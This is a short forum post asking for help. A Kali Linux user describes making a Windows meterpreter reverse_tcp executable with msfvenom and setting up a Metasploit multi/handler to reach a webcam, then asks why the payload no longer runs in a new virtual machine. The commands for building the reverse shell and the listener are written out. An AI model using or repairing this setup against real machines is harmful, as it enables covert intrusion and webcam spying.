Hi, I am a Kali Linux user,
and I used metasploit to get access of the webcam.
In the last virtual machine, it worked well, but in this virtual machine, the payload does not execute.
I did :
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.x.x LPORT=4444 -f exe > /root/Desktop/abc.exe
Until now, It successfully worked, but in the metasploit framework console,
use exploit/multi/handler
set LHOST 192.168.xx
set LPORT 4444
exploit -j -z
then it says
Exploit running as background job 0.
Started reverse TCP handler on 192.168.x.x:4444
Then it does nothing.
So I can not even use Veil,TheFatRat,zirikatu now.....
Please Help.
Comments
No Comments Exist
Be the first, drop a comment!